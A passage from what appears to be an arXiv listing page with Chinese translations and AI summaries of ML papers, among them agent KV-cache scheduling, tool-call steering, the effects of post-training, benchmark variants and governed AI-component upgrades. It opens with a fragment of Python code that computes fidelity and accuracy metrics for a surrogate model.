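    if len(xs) != len(ys) or not xs:
        raise ValueError("sequences must be non-empty and of equal length")
    return sum(x == y for x, y in zip(xs, ys)) / len(xs)


def fidelity(target_preds: Sequence[Hashable], surrogate_preds: Sequence[Hashable]) -> float:
    """How closely the stolen model mimics the target, right or wrong."""
    return agreement_rate(target_preds, surrogate_preds)


def accuracy(preds: Sequence[Hashable], labels: Sequence[Hashable]) -> float:
    """Task utility: how often predictions match ground-truth labels."""
    return agreement_rate(preds, labels)
```

A surrogate can score high fidelity with modest accuracy if it faithfully copies the target's mistakes, which is why the two are reported separately.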

2511.02230 2026-05-27 cs.OS cs.AI cs.NI 版本更新

Continuum: Efficient and Robust Multi-Turn LLM Agent Scheduling with KV Cache Time-to-Live

Continuum: 基于KV缓存生存时间的高效鲁棒多轮LLM智能体调度

Hanchen Li, Runyuan He, Qiuyang Mang, Qizheng Zhang, Huanzhi Mao, Xiaokun Chen, Hangrui Zhou, Alvin Cheung, Joseph Gonzalez, Ion Stoica

发表机构 * UC Berkeley(加州大学伯克利分校) Stanford University(斯坦福大学) Tensormesh(Tensormesh公司) Tsinghua University(清华大学)

AI总结 针对多轮智能体工作负载中工具调用导致KV缓存无法跨轮重用的问题,提出Continuum系统,通过引入KV缓存的生存时间(TTL)机制,在GPU内存中选择性固定缓存,权衡重算/重载成本与排队延迟,实现作业完成时间平均提升8倍以上。

详情
AI中文摘要

KV缓存管理对于高效的LLM推理至关重要。为了最大化利用率,现有推理引擎会在新请求等待时驱逐已完成请求的KV缓存。但这种策略对于智能体工作负载不适用,因为智能体工作负载将LLM调用与工具调用交错进行,引入了停顿,从而阻止了跨轮次的KV有效重用。由于许多工具调用的持续时间远短于人类响应的多轮聊天,因此在工具调用期间保留KV缓存是有前景的。然而,仍存在许多挑战。首先,我们需要考虑重算或重载(如果启用卸载)的潜在成本,以及从GPU驱逐后增加的排队延迟。其次,由于工具调用持续时间的内部方差,该方法需要在工具调用持续时间有限可预测性下保持鲁棒性。我们提出了Continuum,一个通过引入KV缓存保留的生存时间(TTL)机制来优化多轮智能体工作负载作业完成时间的服务系统。对于生成工具调用的请求,Continuum选择性地将KV缓存固定在GPU内存中,其TTL值由重载成本和驱逐引起的潜在排队延迟决定。当TTL过期时,KV缓存可自动被驱逐以释放GPU内存,从而在边缘情况下提供鲁棒性能。当与程序级先来先服务结合时,Continuum保持了多轮连续性,并减少了智能体工作流的延迟。在真实世界智能体(SWE-Bench、BFCL、OpenHand)上使用Llama-3.1 8B/70B、Gemma-3 12B和GLM-4.5 355B的评估表明,Continuum在提高吞吐量的同时,将平均作业完成时间提升了8倍以上。

英文摘要

KV cache management is essential for efficient LLM inference. To maximize utilization, existing inference engines evict finished requests' KV cache if new requests are waiting. This policy breaks for agentic workloads, which interleave LLM calls with tool calls, introducing pauses that prevent effective KV reuse across turns. Since many tool calls are much shorter than human response times in multi-turn chat, it is promising to retain the KV cache during these tool calls. However, several challenges remain. First, we need to consider both the potential cost of recomputation or reloading (if offloading is enabled) and the increased queueing delay after eviction from the GPU. Second, due to the inherent variance of tool call durations, the method needs to remain robust under limited predictability of those durations. We present Continuum, a serving system that optimizes job completion time for multi-turn agent workloads by introducing a time-to-live (TTL) mechanism for KV cache retention. For requests that generate tool calls, Continuum selectively pins the KV cache in GPU memory with a TTL value determined by the reload cost and the potential queueing delay induced by eviction. When the TTL expires, the KV cache can be automatically evicted to free up GPU memory, providing robust performance in edge cases. When combined with program-level first-come-first-served scheduling, Continuum preserves multi-turn continuity and reduces delay for agentic workflows. Evaluations on real-world agents (SWE-Bench, BFCL, OpenHand) with Llama-3.1 8B/70B, Gemma-3 12B, and GLM-4.5 355B show that Continuum improves the average job completion time by over 8x while improving throughput.
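The pin-with-TTL behavior described above can be illustrated with a small bookkeeping class. This is a toy sketch, not Continuum's implementation: the class and method names are hypothetical, the TTL is supplied by the caller (the paper's rule for deriving it from reload cost and queueing delay is not reproduced here), and real GPU memory management is replaced by a dictionary of expiry times.

```python
from typing import Dict, List


class TTLPinnedCache:
    """Tracks which requests' KV caches are pinned and until when."""

    def __init__(self) -> None:
        self._expiry: Dict[str, float] = {}  # request id -> absolute expiry time

    def pin(self, request_id: str, ttl_seconds: float, now: float) -> None:
        """Pin a request's KV cache when it issues a tool call."""
        self._expiry[request_id] = now + ttl_seconds

    def resume(self, request_id: str, now: float) -> bool:
        """Tool call returned. True means the cache is still pinned (reuse it);
        False means it expired or was evicted, so recompute or reload."""
        expiry = self._expiry.pop(request_id, None)
        return expiry is not None and now <= expiry

    def evict_expired(self, now: float) -> List[str]:
        """Drop every pin whose TTL has passed and return the freed request ids."""
        expired = [rid for rid, t in self._expiry.items() if t < now]
        for rid in expired:
            del self._expiry[rid]
        return expired
```

The expiry acts as a safety valve: a tool call that runs far longer than expected cannot hold GPU memory indefinitely, which matches the robustness argument in the abstract.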

2605.09156 2026-05-27 cs.CL cs.AI 版本更新

Lost in Translation? Exploring the Shift in Grammatical Gender from Latin to Occitan

迷失在翻译中?探索从拉丁语到奥克语的语法性别转变

Ahan Chatterjee, Matthias Schöffel, Matthias Aßenmacher, Marinus Wiedner, Esteban Garces Arias

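Affiliations: Bavarian Academy of Sciences (BAdW); LMU Munich; Munich Center for Machine Learning (MCML); University of Freiburg

AI summary: Proposes an interpretable deep learning framework that analyzes, at the lexical and contextual levels, the shift in grammatical gender from Latin's tripartite system (masculine, feminine, neuter) to Occitan's bipartite one (masculine, feminine), and shows how an improved tokenization strategy, morphological features, and part-of-speech categories contribute to gender prediction.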

Comments Accepted at NLP4DH @ ACL 2026

详情
AI中文摘要

从拉丁语到罗曼语族的历时演变涉及语法性别系统的重组,在大多数罗曼语中从三分结构(阳性、阴性、中性)变为二分结构(阳性、阴性)。在这项工作中,我们引入了一个可解释的深度学习框架,在词法和上下文层面研究这一现象。首先,我们表明传统的分词策略对于这种低资源历史设置不够稳健,而我们提出的分词器在这些基线上提高了性能。在词法层面,我们评估了形态特征对性别预测的贡献。在上下文层面,我们量化了不同词性类别对语法性别预测的贡献。这些分析共同刻画了性别信息在词元及其句子上下文之间的分布。我们在 https://github.com/ahan-2000/Lost-in-Translation- 公开了我们的代码库、数据集和结果。

英文摘要

The diachronic evolution from Latin to the Romance languages involved a restructuring of the grammatical gender system from a tripartite configuration (masculine, feminine, neuter) to a bipartite one (masculine, feminine) in most Romance languages. In this work, we introduce an interpretable deep learning framework to investigate this phenomenon at both lexical and contextual levels. First, we show that conventional tokenization strategies are insufficiently robust for this low-resource historical setting, and that our proposed tokenizer improves performance over these baselines. At the lexical level, we evaluate the contribution of morphological features to gender prediction. At the contextual level, we quantify the contributions of different part-of-speech categories to grammatical gender prediction. Together, these analyses characterize the distribution of gender information between the lemma and its sentential context. We make our codebase, datasets, and results publicly available at https://github.com/ahan-2000/Lost-in-Translation-.

2605.03929 2026-05-27 cs.SD cs.AI cs.LG eess.SP 版本更新

PHALAR: Phasors for Learned Musical Audio Representations

PHALAR:用于学习音乐音频表示的相量

Davide Marincione, Michele Mancusi, Giorgio Strano, Luca Cerovaz, Donato Crisostomi, Roberto Ribuoli, Emanuele Rodolà

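Affiliations: Department of Computer Science, Sapienza University of Rome, Italy; Moises Systems, Inc.; Paradigma, Inc.

AI summary: Proposes PHALAR, a contrastive framework that uses a Learned Spectral Pooling layer and a complex-valued head to enforce pitch and phase equivariance. On stem retrieval it needs fewer than 50% of the parameters and trains 7× faster, with a relative accuracy gain of up to about 70%, and it captures robust musical structure.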

Comments Accepted at ICML 2026

详情
AI中文摘要

茎检索,即匹配缺失茎到给定音频子混音的任务,是一个关键挑战,目前受限于丢弃时间信息的模型。我们引入PHALAR,一个对比框架,在参数少于50%且训练加速7倍的情况下,相对于现有技术实现了高达约70%的相对准确率提升。通过利用学习谱池化层和复值头,PHALAR强制施加音高等变和相位等变偏差。PHALAR在MoisesDB、Slakh和ChocoChorales上建立了新的检索最优结果,与人类一致性判断的相关性显著高于语义基线。最后,零样本节拍跟踪和线性和弦探测证实PHALAR捕获了超越检索任务的鲁棒音乐结构。

英文摘要

Stem retrieval, the task of matching missing stems to a given audio submix, is a key challenge currently limited by models that discard temporal information. We introduce PHALAR, a contrastive framework achieving a relative accuracy increase of up to ≈70% over the state-of-the-art while requiring <50% of the parameters and a 7× training speedup. By utilizing a Learned Spectral Pooling layer and a complex-valued head, PHALAR enforces pitch-equivariant and phase-equivariant biases. PHALAR establishes new retrieval state-of-the-art across MoisesDB, Slakh, and ChocoChorales, correlating significantly higher with human coherence judgment than semantic baselines. Finally, zero-shot beat tracking and linear chord probing confirm that PHALAR captures robust musical structures beyond the retrieval task.

2605.07990 2026-05-27 cs.CL cs.AI cs.LG cs.SE 版本更新

Tool Calling is Linearly Readable and Steerable in Language Models

语言模型中的工具调用是线性可读且可引导的

Zekun Wu, Ze Wang, Seonglae Cho, Yufei Yang, Adriano Koshiyama, Sahan Bulathwela, Maria Perez-Ortiz

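Affiliations: University College London; Holistic AI; Imperial College London

AI summary: Finds that language models contain linear directions corresponding to tool selection. Intervening along such a direction switches the tool call and can flag likely errors in advance, validated across multiple models and benchmarks.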

Comments 24 pages. ACL ARR May 2026 submission (EMNLP 2026 preferred venue); v2 reflects revised manuscript

详情
AI中文摘要

当工具调用代理选错工具时,失败在执行之前是不可见的:邮件被发送,会议被错过。随着代理承担重要行动,一次糟糕的工具调用可能造成实际损害。目前我们无法在模型内部查看并在错误发生前捕捉它;本文表明我们可以做到。在模型内部,工具的选择由激活空间中的单个方向承载,每对工具对应一个方向。在生成过程中添加该方向会切换模型选择的工具。在涵盖 Gemma 3、Qwen 3、Qwen 2.5 和 Llama 3.1(270M 到 27B)的 12 个指令微调模型和 6 个基础模型上,这在 4B+ 指令微调模型上对 15 个工具的合成基准达到 83-100% 的准确率,在真实 API 基准 τ-bench airline 上达到 77-94%。随后的 JSON 参数自动适应新工具的模式,因此仅翻转名称就足够了。相同的每工具方向还能在错误发生前标记潜在错误:模型在两个工具之间不确定的查询失败率比确定的高 21 倍(Gemma 3 27B)。这不仅仅是主题注入:相同幅度的随机向量给出 0% 的切换率,而在单个领域(共享一个主题的 14 个航空工具)内的探针仍然能在五个 4B-14B 模型上以 top-1 61-89% 的准确率读取模型将调用的工具。即使是基础模型在能够输出工具之前内部已经携带了正确的工具:从模型内部状态读取所选工具(余弦读出)在 BFCL 上恢复 61-82% 的准确率,而基础生成仅为 2-10%,这表明预训练形成了表示,而指令微调后来将其连接到输出。我们的结果涵盖单轮、固定菜单设置;在多轮代理循环中,相同的干预不太稳定(匹配基线的增益或损失高达 30 个百分点,没有一致的方向)。

英文摘要

When a tool-calling agent picks the wrong tool, the failure is invisible until execution: the email gets sent, the meeting gets missed. As agents take on consequential actions, one bad tool call can do real damage. We currently have no way to look inside the model and catch the mistake before it happens; this paper shows that we can. Inside the model, the choice of tool is carried by a single direction in activation space, one direction per pair of tools. Adding that direction during generation switches which tool the model picks. Across 12 instruction-tuned and 6 base models spanning Gemma 3, Qwen 3, Qwen 2.5, and Llama 3.1 (270M to 27B), this works at 83-100% accuracy on 4B+ instruction-tuned models on a 15-tool synthetic benchmark and at 77-94% on the real-API benchmark τ-bench airline. The JSON arguments that follow automatically adapt to the new tool's schema, so flipping the name is enough. The same per-tool directions also flag likely errors before they happen: queries where the model is unsure between two tools fail 21x more often than queries where it is not (Gemma 3 27B). This is not just topic injection: random vectors at the same magnitude give a 0% switch rate, and a probe within a single domain (14 airline tools that share one topic) still reads which tool the model will call at 61-89% top-1 accuracy across five 4B-14B models. Even base models already carry the right tool internally before they can emit it: reading the chosen tool off the model's internal state (cosine readout) recovers 61-82% accuracy on BFCL while base generation lands at 2-10%, suggesting pretraining forms the representation and instruction tuning later wires it to the output. Our results cover single-turn, fixed-menu settings; on multi-turn agent loops the same intervention is less stable (matched-baseline gain or loss of up to 30 percentage points with no consistent direction).
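
To make the "one direction per pair of tools" idea concrete, here is a minimal sketch on toy 2-D vectors. It assumes the direction is a difference of class means, which the abstract does not state, and all function names and data are hypothetical stand-ins for real model activations.

```python
import math


def mean(vectors):
    """Component-wise mean of a list of equal-length vectors."""
    n = len(vectors)
    return [sum(col) / n for col in zip(*vectors)]


def cosine(u, v):
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    return dot / (norm_u * norm_v)


def pair_direction(acts_src, acts_dst):
    # Assumed construction: mean activation for the target tool
    # minus mean activation for the source tool.
    mu_src, mu_dst = mean(acts_src), mean(acts_dst)
    return [d - s for s, d in zip(mu_src, mu_dst)]


def steer(hidden, direction, alpha=1.0):
    """Add the scaled pair direction to a hidden state."""
    return [h + alpha * d for h, d in zip(hidden, direction)]


def cosine_readout(hidden, tool_means):
    """Pick the tool whose mean activation is most aligned with the hidden state."""
    return max(tool_means, key=lambda name: cosine(hidden, tool_means[name]))
```

In a real model the vectors would be residual-stream activations at a chosen layer; the layer and the scale `alpha` would have to be tuned, and neither is specified here.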

2605.07632 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Post-training makes large language models less human-like

后训练使大型语言模型更不像人类

Marcel Binz, Elif Akata, Abdullah Almaatouq, Mohammed Alsobay, Oleksii Ariasov, Franziska Brändle, David Broska, Jason W. Burton, Nuno Busch, Frederick Callaway, Vanessa Cheung, Brian Christian, Julian Coda-Forno, Can Demircan, Vittoria Dentella, Maria K. Eckstein, Noémi Éltető, Michael Franke, Thomas L. Griffiths, Fritz Günther, Susanne Haridi, Sebastian Hellmann, Stefan Herytash, Linus Hof, Eleanor Holton, Isabelle Hoxha, Zak Hussain, Akshay Jagadish, Elif Kara, Valentin Kriegmair, Evelina Leivada, Li Ji-An, Tobias Ludwig, Maximilian Maier, Marcelo G. Mattar, Marvin Mathony, Alireza Modirshanechi, Robin Na, Mariia Nadverniuk, Antonios Nasioulas, Surabhi S. Nath, Helen Niemeyer, Kate Nussenbaum, Sebastian Olschewski, Thorsten Pachur, Stefano Palminteri, Aliona Petrenco, Camille V. Phaneuf-Hadd, Angelo Pirrone, Manuel Rausch, Laura Raveling, Shashank Reddy, Milena Rmus, Evan M. Russek, Tankred Saanum, Kai Sandbrink, Louis Schiekiera, Johannes A. Schubert, Luca M. Schulze Buschoff, Nishad Singhi, Leah H. Somerville, Mikhail S. Spektor, Xin Sui, Christopher Summerfield, Mirko Thalmann, Anna I. Thoma, Taisiia Tikhomirova, Vuong Truong, Polina Tsvilodub, Konstantinos Voudouris, Kristin Witte, Shuchen Wu, Dirk U. Wulff, Hua-Dong Xiong, Songlin Xu, Lance Ying, Xinyu Zhang, Jian-Qiao Zhu, Eric Schulz

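Affiliations: Helmholtz Munich; Massachusetts Institute of Technology; University of Tübingen; University of Oxford; Stanford

AI summary: Using the newly introduced Psych-201 dataset, finds that post-training (the stage that turns base models into useful assistants) consistently reduces alignment with human behavior, that this misalignment widens in newer model generations, and that persona induction does not improve individual-level predictions.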

详情
AI中文摘要

大型语言模型(LLMs)越来越多地被用作人类参与者的替代品,但目前尚不清楚哪些模型最能捕捉人类行为及其原因。为了解决这个问题,我们引入了Psych-201,这是一个新颖的数据集,使我们能够大规模测量行为对齐。我们发现,后训练——将基础模型转化为有用助手的阶段——在模型家族、规模和目标上一致地降低了与人类行为的对齐度。此外,这种错位在新模型世代中扩大,即使基础模型继续改进。最后,我们发现人物诱导——一种通过将模型条件化为参与者特定信息来引发类人行为的流行技术——并不能改善个体层面的预测。综合来看,我们的结果表明,当前用于将LLMs转化为有用助手的那些过程也使得它们成为人类行为的不太准确的模型。

英文摘要

Large language models (LLMs) are increasingly used as surrogates for human participants, but it remains unclear which models best capture human behavior and why. To address this, we introduce Psych-201, a novel dataset that enables us to measure behavioral alignment at scale. We find that post-training -- the stage that turns base models into useful assistants -- consistently reduces alignment with human behavior across model families, sizes, and objectives. Moreover, this misalignment widens in newer model generations even as base models continue to improve. Finally, we find that persona-induction -- a popular technique for eliciting human-like behavior by conditioning models on participant-specific information -- does not improve predictions at the level of individuals. Taken together, our results suggest that the very processes that are currently employed to turn LLMs into useful assistants also make them less accurate models of human behavior.

2605.07521 2026-05-27 cs.AI 版本更新

From Feasible to Practical: Pareto-Optimal Synthesis Planning

从可行到实用:帕累托最优合成规划

Friedrich Hastedt, Dongda Zhang, Antonio del Rio Chanona

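Affiliations: Department of Chemical Engineering, Imperial College London, UK; Department of Chemical Engineering, University of Manchester, UK

AI summary: Existing synthesis planning methods ignore multi-objective trade-offs. The paper proposes MORetro*, which builds on multi-objective A* search to generate a Pareto front of routes that captures trade-offs among criteria such as cost, sustainability, and toxicity.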

Comments Published in Proceedings of the 43rd International Conference on Machine Learning (ICML 2026)

详情
AI中文摘要

当前的计算机辅助合成规划(CASP)方法通常将逆合成视为一旦找到单一可行路线即解决,主要关注收敛性或最短路径指标。这种观点与现实实践不符,因为化学家必须平衡成本、可持续性、毒性和总产率等相互竞争的目标。为解决这一问题,我们将合成规划建模为多目标搜索问题,并引入MORetro*算法,该算法生成合成路线的帕累托前沿,以明确捕捉用户定义标准之间的权衡。MORetro*使用加权标量化和基于贝叶斯优化的采样,有效导航组合搜索空间并优先考虑有前景的权衡。基于多目标A*搜索,我们提供了最优性保证,表明对于固定的单步模型,MORetro*在可采纳性条件下恢复真实的帕累托前沿。在多个逆合成基准测试中,MORetro*生成了多样化、高质量的帕累托前沿,发现了单目标方法忽略的解决方案,并使CASP输出更符合工业决策。

英文摘要

Current computer-aided synthesis planning (CASP) methods often treat retrosynthesis as solved once a single feasible route is identified, focusing primarily on convergence or shortest-path metrics. This view is misaligned with real-world practice, where chemists must balance competing objectives such as cost, sustainability, toxicity, and overall yield. To address this, we formulate synthesis planning as a multi-objective search problem and introduce MORetro*, an algorithm that generates a Pareto front of synthesis routes to explicitly capture trade-offs among user-defined criteria. MORetro* uses weighted scalarization and BO-informed sampling to efficiently navigate the combinatorial search space and prioritize promising trade-offs. Building on multi-objective A*-search, we provide optimality guarantees showing that, for a fixed single-step model, MORetro* recovers the true Pareto front under admissibility. Across multiple retrosynthesis benchmarks, MORetro* produces diverse, high-quality Pareto fronts, uncovering solutions overlooked by single-objective approaches and better aligning CASP outputs with industrial decision-making.
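
As a rough illustration of the two ingredients named in this abstract, a Pareto front and weighted scalarization, the sketch below filters dominated routes and then ranks the survivors under different weights. It is not the MORetro* search itself; the route names and cost vectors are invented, and every objective is assumed to be minimized.

```python
def dominates(a, b):
    """True if cost vector a is no worse than b everywhere and strictly better somewhere."""
    return all(x <= y for x, y in zip(a, b)) and any(x < y for x, y in zip(a, b))


def pareto_front(routes):
    """Keep only the routes that no other route dominates (minimization)."""
    return {
        name: costs
        for name, costs in routes.items()
        if not any(dominates(other, costs) for other in routes.values())
    }


def scalarize(costs, weights):
    """Collapse a cost vector into one number with user-chosen weights."""
    return sum(w * c for w, c in zip(weights, costs))


# Hypothetical routes scored as (material cost, toxicity score).
routes = {
    "route_a": (10.0, 0.2),
    "route_b": (6.0, 0.5),
    "route_c": (12.0, 0.6),  # worse than route_a on both objectives
}
front = pareto_front(routes)
cheapest = min(front, key=lambda n: scalarize(front[n], (1.0, 0.0)))
least_toxic = min(front, key=lambda n: scalarize(front[n], (0.0, 1.0)))
```

Different weight vectors pick different points on the front, which is why a single scalarized objective on its own can hide viable trade-offs.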

2603.12647 2026-05-27 cs.CV cs.AI 版本更新

LR-SGS: Robust LiDAR-Reflectance-Guided Salient Gaussian Splatting for Self-Driving Scene Reconstruction

LR-SGS:用于自动驾驶场景重建的鲁棒激光雷达反射率引导显著高斯泼溅

ZY Chen, F Zhu, H Zhu, DY Kong, XK Kuang, YJ Zhang, CM Jiang

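Affiliations: Waymo Open Dataset

AI summary: Proposes a Salient Gaussian representation that combines LiDAR reflectance with RGB, using structure-aware initialization, reflectance calibration, and joint alignment for efficient, robust self-driving scene reconstruction.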

Comments 8 pages, 7 figures

详情
AI中文摘要

最近的3D高斯泼溅(3DGS)方法已证明了自动驾驶场景重建和新视角合成的可行性。然而,现有方法大多仅依赖相机,或仅将激光雷达用于高斯初始化或深度监督,而点云中包含的丰富场景信息(如反射率)以及激光雷达与RGB之间的互补性尚未被充分利用,导致在具有高自运动和复杂光照等挑战性自动驾驶场景中性能下降。为解决这些问题,我们提出了一种鲁棒且高效的激光雷达反射率引导显著高斯泼溅方法(LR-SGS),用于自动驾驶场景。该方法引入了一种结构感知的显著高斯表示,该表示从激光雷达提取的几何和反射率特征点初始化,并通过显著变换和改进的密度控制来捕捉边缘和平面结构。此外,我们将激光雷达强度校准为反射率,并将其作为光照不变的材料通道附加到每个高斯上,与RGB联合对齐以强制边界一致性。在Waymo Open数据集上的大量实验表明,LR-SGS以更少的高斯和更短的训练时间实现了优越的重建性能。特别是在复杂光照场景下,我们的方法在PSNR上超过OmniRe 1.18 dB。

英文摘要

Recent 3D Gaussian Splatting (3DGS) methods have demonstrated the feasibility of self-driving scene reconstruction and novel view synthesis. However, most existing methods either rely solely on cameras or use LiDAR only for Gaussian initialization or depth supervision, while the rich scene information contained in point clouds, such as reflectance, and the complementarity between LiDAR and RGB have not been fully exploited, leading to degradation in challenging self-driving scenes, such as those with high ego-motion and complex lighting. To address these issues, we propose a robust and efficient LiDAR-reflectance-guided Salient Gaussian Splatting method (LR-SGS) for self-driving scenes, which introduces a structure-aware Salient Gaussian representation, initialized from geometric and reflectance feature points extracted from LiDAR and refined through a salient transform and improved density control to capture edge and planar structures. Furthermore, we calibrate LiDAR intensity into reflectance and attach it to each Gaussian as a lighting-invariant material channel, jointly aligned with RGB to enforce boundary consistency. Extensive experiments on the Waymo Open Dataset demonstrate that LR-SGS achieves superior reconstruction performance with fewer Gaussians and shorter training time. In particular, on Complex Lighting scenes, our method surpasses OmniRe by 1.18 dB PSNR.

2605.07053 2026-05-27 cs.CL cs.AI 版本更新

GSM-SEM: Benchmark and Framework for Generating Semantically Variant Augmentations

GSM-SEM: 生成语义变体增强的基准与框架

Jyotika Singh, Fang Tu, Aziza Mirsaidova, Amit Agarwal, Hitesh Laxmichand Patel, Sandip Ghoshal, Miguel Ballesteros, Karan Dua, Yassine Benajiba, Weiyi Sun, Tao Sheng, Graham Horwood, Sujith Ravi, Dan Roth

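Affiliations: Oracle AI

AI summary: Proposes GSM-SEM, a framework that generates semantically diverse variants of math problems by modifying entities, attributes, and relationships, reducing memorization bias from fixed test sets. Performance drops are observed across several benchmarks.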

详情
AI中文摘要

像GSM8K这样的基准测试是数学推理的流行度量,但由于对固定测试集的记忆,排行榜上的提升可能夸大真实能力。大多数鲁棒性变体应用表面级别的扰动(释义、重命名、数字交换、干扰项),这些扰动在很大程度上保留了底层事实,而静态发布本身可能随着时间的推移成为记忆目标。我们引入了GSM-SEM,一个可重用且随机的框架,用于生成语义多样化的基准变体,其语义方差显著高于先前方法。GSM-SEM通过修改实体、属性和/或关系来扰动问题陈述,经常改变底层事实,并要求模型在新条件下重新计算解决方案,同时约束生成以保留原始计算/答案和近似问题难度。GSM-SEM在每次运行时生成新的变体,无需重新标注,减少了对静态公共基准评估的依赖,从而降低了记忆偏差。我们将GSM-SEM应用于GSM8K和两个现有的变体系列(GSM-Symbolic和GSM-Plus),生成了GSM8K-SEM、GSM-Symbolic-SEM和GSM-Plus-SEM。评估14个SOTA LLM,我们观察到一致的性能下降,当语义扰动与符号/plus变体结合时下降更大(在GSM-SEM的最大严格配置中平均下降率为28%)。我们公开发布这三个SEM变体作为完全人工验证的数据集。最后,为了展示在GSM风格数学问题之外的适用性,我们将GSM-SEM应用于其他基准,包括BigBenchHard、LogicBench和NLR-BIRD。

英文摘要

Benchmarks like GSM8K are popular measures of mathematical reasoning, but leaderboard gains can overstate true capability due to memorization of fixed test sets. Most robustness variants apply surface-level perturbations (paraphrases, renamings, number swaps, distractors) that largely preserve the underlying facts, and static releases can themselves become memorization targets over time. We introduce GSM-SEM, a reusable and stochastic framework for generating semantically diverse benchmark variants with substantially higher semantic variance than prior approaches. GSM-SEM perturbs problem statements by modifying entities, attributes, and/or relationships, frequently altering underlying facts and requiring models to recompute solutions under new conditions, while constraining generation to preserve the original calculations/answer and approximate problem difficulty. GSM-SEM generates fresh variants on each run without requiring re-annotation, reducing reliance on static public benchmarks for evaluation and thereby lowering the bias of memorization. We apply GSM-SEM on GSM8K and two existing variation suites (GSM-Symbolic and GSM-Plus), producing GSM8K-SEM, GSM-Symbolic-SEM, and GSM-Plus-SEM. Evaluating 14 SOTA LLMs, we observe consistent performance drops with larger decline when semantic perturbations are coupled with symbolic/plus variations (average drop rate 28% in maximum strictness configuration of GSM-SEM). We publicly release the three SEM variants as fully human-validated datasets. Finally, to demonstrate applicability beyond GSM-style math problems, we apply GSM-SEM to additional benchmarks including BigBenchHard, LogicBench, and NLR-BIRD.

2604.08059 2026-05-27 cs.RO cs.AI 版本更新

Governed Capability Evolution: Lifecycle-Time Compatibility Checking and Rollback for AI-Component-Based Systems, with Embodied Agents as Case Study

受治理的能力演化:基于AI组件的系统的生命周期兼容性检查与回滚——以具身智能体为例

Xue Qin, Simin Luan, John See, Zeyd Boukhers, Cong Yang, Zhijun Li

Affiliations: School of Software, Harbin Institute of Technology; School of Computer Science and Technology, Harbin Institute of Technology; School of Mathematical and Computer Sciences, Heriot-Watt University, Malaysia Campus; School of Future Science and Engineering, Soochow University; Fraunhofer Institute for Applied Information Technology

AI summary: For AI-component-based systems, proposes a governed capability evolution framework with four classes of compatibility checks and a seven-stage upgrade pipeline for safe deployment, achieving zero unsafe activations in embodied-agent experiments.

Comments 42 pages, 7 figures, 12 tables

详情
AI中文摘要

由版本化AI组件构建的软件系统越来越需要生命周期治理:当能力模块演化到新版本时,宿主系统必须决定新版本是否可以安全激活、应在何种部署条件下运行、如何监控以及何时回滚。现有的软件部署模式(金丝雀发布、蓝绿部署、特性标志和MLOps管线)解决了这一循环的部分问题,但它们是针对无状态Web服务而非驱动现场AI组件的带状态、策略约束运行时设计的。我们将受治理的能力演化形式化为基于AI组件的系统的一等软件生命周期问题,并提出一个分阶段升级框架,其中每个新能力版本被视为受治理的部署候选,而非立即可执行的替换。该框架引入了四类升级兼容性检查(接口、策略、行为、恢复),并将其组织成七阶段管线(候选验证、沙箱评估、影子部署、门控激活、在线监控、回滚、审计)。我们在带有ROS 2中间件的PyBullet操作测试平台上实现了参考原型,并在15个随机种子的6轮能力升级中进行了评估。朴素升级实现了72.9%的任务成功率,但到最后一轮不安全激活率升至60%;受治理升级保持了可比的成功率(67.4%),同时在所有轮次中保持零不安全激活(Wilcoxon p=0.003)。影子部署揭示了40%的升级回归问题,这些问题是单独沙箱评估无法发现的,并且在79.8%的激活后漂移场景中回滚成功。

英文摘要

Software systems built from versioned AI components increasingly need lifecycle-time governance: when a capability module evolves into a new version, the hosting system must decide whether the new version may be activated safely, under what deployment conditions it should run, how it must be monitored, and when it should be rolled back. Existing software-deployment patterns (canary release, blue-green, feature flags, and MLOps pipelines) address parts of this loop but were designed for stateless web services rather than for stateful, policy-constrained runtimes that drive AI components in the field. We formulate governed capability evolution as a first-class software-lifecycle problem for AI-component-based systems and propose a staged upgrade framework in which every new capability version is treated as a governed deployment candidate rather than an immediately executable replacement. The framework introduces four upgrade compatibility checks (interface, policy, behavioral, recovery) and organizes them into a seven-stage pipeline (candidate validation, sandbox evaluation, shadow deployment, gated activation, online monitoring, rollback, audit). We implement a reference prototype on a PyBullet manipulation testbed with ROS 2 middleware and evaluate it over 6 rounds of capability upgrade with 15 random seeds. Naive upgrade achieves 72.9% task success but drives unsafe activation to 60% by the final round; governed upgrade retains comparable success (67.4%) while maintaining zero unsafe activations across all rounds (Wilcoxon p=0.003). Shadow deployment reveals 40% of upgrade regressions invisible to sandbox evaluation alone, and rollback succeeds in 79.8% of post-activation drift scenarios.
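
The four compatibility checks and seven pipeline stages listed in this abstract can be written down as plain data with a simple gate. This is a sketch only: the abstract does not say how checks map onto stages, so the all-checks-must-pass rule and the `gate` helper are assumptions made for illustration.

```python
# The four upgrade compatibility checks named in the abstract.
CHECKS = ("interface", "policy", "behavioral", "recovery")

# The seven pipeline stages named in the abstract, in order.
STAGES = (
    "candidate validation",
    "sandbox evaluation",
    "shadow deployment",
    "gated activation",
    "online monitoring",
    "rollback",
    "audit",
)


def gate(check_results):
    """Assumed rule: a candidate may be activated only if every check passed.

    Checks missing from check_results are treated as failed.
    Returns (allowed, list_of_failed_checks).
    """
    failed = [name for name in CHECKS if not check_results.get(name, False)]
    return (not failed, failed)
```

Treating a missing check as a failure keeps the gate conservative: a candidate that was never evaluated on, say, recovery cannot be activated by omission.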

2605.06213 2026-05-27 cs.AI 版本更新

Beyond Fixed Benchmarks and Worst-Case Attacks: Dynamic Boundary Evaluation for Language Models

超越固定基准和最坏情况攻击:语言模型的动态边界评估

Haoxiang Wang, Da Yu, Huishuai Zhang

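AI summary: Proposes Dynamic Boundary Evaluation (DBE), which locates boundary items whose pass probability under random-sampling decoding is near 0.5 and builds an evaluation protocol on a unified difficulty scale to address the saturation of fixed benchmarks.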

Comments This submission is being withdrawn because it was submitted without the knowledge and authorization of all co-authors. The authors need to resolve this authorship/authorization issue before any public posting

详情
AI中文摘要

